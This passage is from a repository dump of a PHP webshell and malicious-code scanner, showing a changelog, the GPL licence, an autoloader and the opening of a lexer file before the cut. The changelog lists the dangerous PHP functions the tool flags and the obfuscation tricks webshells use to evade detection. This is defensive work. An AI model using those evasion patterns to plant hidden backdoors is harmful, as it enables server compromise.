├── .gitignore ├── CHANGES.cn ├── LICENSE ├── Pecker ├── Autoloader.php ├── Lexer.php ├── Loger.php ├── Parser.php └── Scanner.php ├── PeckerLite └── PeckerScanner.lite.php ├── README.md ├── index.php ├── template.html └── test └── 1.php /.gitignore: -------------------------------------------------------------------------------- 1 | # Zend Studio 2 | .project 3 | .buildpath -------------------------------------------------------------------------------- /CHANGES.cn: -------------------------------------------------------------------------------- 1 | Pecker Scanner-0.4.3 [2014-03-06] 2 | * Bugfix:修复复杂句法规则curly syntax的变量函数漏报问题。(thanks for XNR https://github.com/chinurho) 3 | 4 | Pecker Scanner-0.4.2 [2014-03-05] 5 | * Bugfix:更新template.html中pecker scanner server的网址。 6 | 7 | Pecker Scanner-0.4.1 [2014-03-04] 8 | * Bugfix:更改changes日志记录 9 | 10 | Pecker Scanner-0.4.0 [2014-03-03] 11 | * Bugfix:修复变量中使用"{" 和 "["的语法拼接成的变量函数的漏检。 12 | * Bugfix:修复引用文件语法后,下一个语法字符不是";"而拼接字符"."的语法。EG:(require '1.dat').'.php';(thanks for poker付 http://weibo.com/1776130645 ) 13 | * Bugfix:添加 "include"到默认检测配置。 14 | 15 | Pecker Scanner-0.3.1 [2013-09-26] 16 | * Feature: 增加file_put_contents、call_user_func_array、call_user_func函数到检测列表 17 | * Feature: 增加preg_replace的e修饰符回调函数到检测列表 18 | 19 | Pecker Scanner-0.3.0 [2013-09-22] 20 | * Feature: 服务器云判断确认恶意代码功能 21 | 22 | Pecker Scanner-0.2.4 [2013-09-17] 23 | * Feature: 云判断支持(参数部分) 24 | 25 | Pecker Scanner-0.2.3 [2013-09-16] 26 | * Improve: 精确只获取恶意函数中,参数部分的token。 27 | * Bugfix: 变量类名也捕获bug。 28 | * Bugfix: 修复捕获T_ENCAPSED_AND_WHITESPACE中变量函数的bug。 29 | * Buffix: 修复计算当前token的下一个token时,key计算错误。 30 | 31 | Pecker Scanner-0.2.2 [2013-09-14 23:00] 32 | * Feature: 增加assert函数到默认检测列表。 (感谢bgho4t的反馈) 33 | * Bugfix:修复危险函数后面用段注释、区块注释分割时,被漏掉的BUG。(感谢bgho4t的反馈) 34 | 35 | Pecker Scanner-0.2.1 [2013-09-14] 36 | * Feature: 增加危险函数附近代码的去除空白字符、行注视、段注释之后的token的hash生成,便于后续云判断,跟服务器校对该hash是否已经被举报为木马 37 | * Bugfix:修复变量函数名检查误报BUG 38 | * Bugfix:修复执行超时问题 39 | 40 | Pecker Scanner-0.2 [2013-09-13] 41 | * Feature: 增加危险函数附近代码的展示功能 42 | * Feature: 增加对include\require系列语言结构的扫描检查 43 | * Bugfix:修复变量函数名检查误报BUG 44 | * Bugfix:修复类方法出现被扫描函数时,误报问题 45 | 46 | Pecker Scanner-0.1 [2013-09-12] 47 | * Feature: 支持对扫描的文件拓展名,文件路径的自定义配置,自定义扫描关键字配置。 48 | * Feature: 实现对变量函数的扫描检查 49 | * Feature: 实现对eval语言结构的扫描检查 50 | * Feature: 实现扫描报告输出 51 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. {http://fsf.org/} 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | {one line to give the program's name and a brief idea of what it does.} 635 | Copyright (C) {year} {name of author} 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see {http://www.gnu.org/licenses/}. 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | pecker Copyright (C) 2013 陈驰 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | {http://www.gnu.org/licenses/}. 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | {http://www.gnu.org/philosophy/why-not-lgpl.html}. 675 | -------------------------------------------------------------------------------- /Pecker/Autoloader.php: -------------------------------------------------------------------------------- 1 | 15 | * @package Scanner 16 | * @version $Id: Autoloader.php 1 2013-09-12 03:45:27Z cfc4n $ 17 | */ 18 | 19 | class Pecker_Autoloader 20 | { 21 | static public function register() 22 | { 23 | ini_set('unserialize_callback_func', 'spl_autoload_call'); 24 | spl_autoload_register(array(__CLASS__, 'autoload')); 25 | } 26 | 27 | static public function autoload($class) 28 | { 29 | if (0 !== strpos($class, 'Pecker')) { 30 | return; 31 | } 32 | $file = dirname(dirname(__FILE__)) . '/' . strtr($class, '_', '/') . '.php'; 33 | if (is_file($file)) { 34 | require $file; 35 | } 36 | } 37 | } 38 | ?> -------------------------------------------------------------------------------- /Pecker/Lexer.php: -------------------------------------------------------------------------------- 1 | 17 | * @package Lexer 18 | * @version $Id: Lexer.php 7 2013-09-13 03:29:53Z cfc4n $ 19 | */ 20 | 21 | class Pecker_Lexer 22 | { 23 | protected $code; 24 | protected $tokens; 25 | protected $pos; 26 | protected $line; 27 | protected $errMsg; 28 | protected $dropTokens; 29 | 30 | public function __construct() { 31 | 32 | $this->tokenMap = $this->createTokenMap(); 33 | // map of tokens to drop while lexing (the map is only used for isset lookup, 34 | // that's why the value is simply set to 1; the value is never actually used.) 35 | $this->dropTokens = array_fill_keys(array(T_WHITESPACE, 